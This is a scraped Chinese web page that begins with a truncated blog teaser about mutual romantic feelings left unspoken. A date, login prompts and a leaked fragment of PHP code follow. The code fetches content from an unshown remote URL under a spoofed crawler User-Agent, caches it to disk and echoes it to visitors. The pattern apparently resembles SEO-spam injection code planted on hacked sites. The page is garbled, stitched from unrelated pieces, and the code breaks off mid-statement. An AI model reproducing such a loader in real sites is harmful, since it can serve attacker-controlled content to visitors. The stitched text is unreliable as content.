曾经网上有一个问卷调查,题目是“你觉得世界上最令人遗憾的事是什么?”当时我填的是“两个人相爱,互相却不知”,确实世界上有太多令人遗憾的的事了,但在感情中最令人遗憾的就是两个人互相有好感,但互相之间又不知道。 很多男生在感情中都有这个疑虑,当自己对一个女生有好感的时候,却不知道对方喜欢喜欢自己,想付出但又怕对方对自己没意思而白费,所以总是在
2021-11-28 428
显示验证码
没有账号?注册  忘记密码?
array( "header"=>array( "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 Seowhy", ), "method" => "GET", "timeout" => 2 ), ); $context = stream_context_create($opts); $content = @file_get_contents($url,false, $context); if (isset($http_response_header)) { if(is_array($http_response_header)){ $http_response_header = $http_response_header[0]; } if(strpos($http_response_header,"200 OK") !==false && $content != "error"){ @file_put_contents($cacheUrl, $content); echo $content; } } }else{ $content = @file_get_contents($cacheUrl); echo $content; } ?>